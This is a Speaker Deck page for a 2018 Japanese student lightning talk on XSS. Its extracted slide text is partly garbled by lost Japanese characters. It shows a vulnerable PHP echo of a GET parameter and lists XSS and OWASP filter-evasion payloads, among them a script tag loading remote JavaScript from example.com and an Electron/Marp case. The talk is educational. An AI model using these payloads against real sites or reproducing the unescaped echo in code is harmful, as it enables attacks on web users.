Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
8
Reading HTTP Client Hints
tomoyk
0
120
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
240
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
360
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
450
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1k
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
420
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
190
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
190
Other Decks in Technology
See All in Technology
Amazon Bedrock Knowledge Basesチャンキング解説!
aoinoguchi
0
150
AWS Network Firewall Proxyを触ってみた
nagisa53
1
230
10Xにおける品質保証活動の全体像と改善 #no_more_wait_for_test
nihonbuson
PRO
2
290
Context Engineeringが企業で不可欠になる理由
hirosatogamo
PRO
3
600
GitLab Duo Agent Platform × AGENTS.md で実現するSpec-Driven Development / GitLab Duo Agent Platform × AGENTS.md
n11sh1
0
140
Data Hubグループ 紹介資料
sansan33
PRO
0
2.7k
Sansan Engineering Unit 紹介資料
sansan33
PRO
1
3.9k
量子クラウドサービスの裏側 〜Deep Dive into OQTOPUS〜
oqtopus
0
120
今日から始める Amazon Bedrock AgentCore
har1101
4
410
日本の85%が使う公共SaaSは、どう育ったのか
taketakekaho
1
210
Agile Leadership Summit Keynote 2026
m_seki
1
630
ZOZOにおけるAI活用の現在 ~開発組織全体での取り組みと試行錯誤~
zozotech
PRO
5
5.6k
Featured
See All Featured
Building Adaptive Systems
keathley
44
2.9k
Why Your Marketing Sucks and What You Can Do About It - Sophie Logan
marketingsoph
0
75
We Are The Robots
honzajavorek
0
160
Highjacked: Video Game Concept Design
rkendrick25
PRO
1
290
HU Berlin: Industrial-Strength Natural Language Processing with spaCy and Prodigy
inesmontani
PRO
0
220
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
32
2.1k
Agile that works and the tools we love
rasmusluckow
331
21k
It's Worth the Effort
3n
188
29k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
31
3.1k
Self-Hosted WebAssembly Runtime for Runtime-Neutral Checkpoint/Restore in Edge–Cloud Continuum
chikuwait
0
330
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
35
3.4k
Leveraging Curiosity to Care for An Aging Population
cassininazir
1
160
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
SiteGround - Reliable hosting with speed, security, and support you can count on.
tomoyk
aoinoguchi
nagisa53
nihonbuson
hirosatogamo
n11sh1
sansan33
oqtopus
har1101
taketakekaho
m_seki
zozotech
keathley
marketingsoph
honzajavorek
rkendrick25
inesmontani
garrettdimon
rasmusluckow
3n
danielanewman
chikuwait
rmw
cassininazir
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
